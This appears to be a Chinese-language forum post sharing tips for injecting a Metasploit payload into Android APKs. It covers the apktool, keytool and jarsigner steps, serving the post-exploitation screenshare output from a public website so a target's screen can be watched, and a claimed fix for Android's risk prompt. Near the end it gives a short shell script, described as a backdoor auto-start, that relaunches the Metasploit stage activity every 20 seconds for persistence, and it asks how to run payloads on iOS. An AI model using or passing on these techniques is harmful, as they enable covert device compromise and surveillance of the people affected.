通常我们为了方便测试,都是在本地虚拟机内安装kali系统
这样有利于我们降低环境部署的难度
特别是对于新手来说,
针对安卓apk需要的注入功能需要用到apktool
证书的生成需要用到keytool
签名需要调用jarsigner
有时候你明明配置了不生效可以直接把对应目录创建软连接到全局变量目录下
如将JDK的bin目录创建软连接到全局变量目录
ln -s /opt/jdk-18.0.2.1/bin/ /usr/local/bin/
如生成key命令
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
----言归正传------
但是靶机安装运行成功后,需要有个外网ip对目标进行监听
像我这样在自己服务器上安装metasploit对靶机进行监听的时候就会有个问题
如何使用后渗透命令screenshare进行屏幕共享
我采用的方法是创建一个站点,使用cd命令该站点的可访问页面目录下(如www/wwwroot/www.zhazhahui.com)下执行msfconsole
设置完相关选项后run启动
那么当使用screenshare命令后产生的监听页面就会生成在可访问页面下/dfgdgbfeb.html
在保证www.zhazhahui.com可访问的前提下
此时访问www.zhazhahui.com/dfgdgbfeb.html
即可查看靶机的屏幕共享,当然我用的是静态页面所以需要不断刷新,
你可以尝试下使用伪静态页面尝试或者其他更高级的办法,
-----------
另外风险提示问题的问题已得到通用的解决办法(已在android10系统上测试),
未解决问题:
默认开启的权限较少,
另外一个注入后后渗透上传的自启动shell脚本没有足够的权限,
还有自启动shell内对应包名和MainActivity启动的问题
将下面5行保存为zha.sh即是原装的MainActivity后门自启动shell
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
---------------------------
另外需要大佬指点针对ios系统生成的的可执行文件如何执行,
反正不是点击一下也不是ipa或者其他分发下载的形式
新人新帖欢迎大家踊跃讨论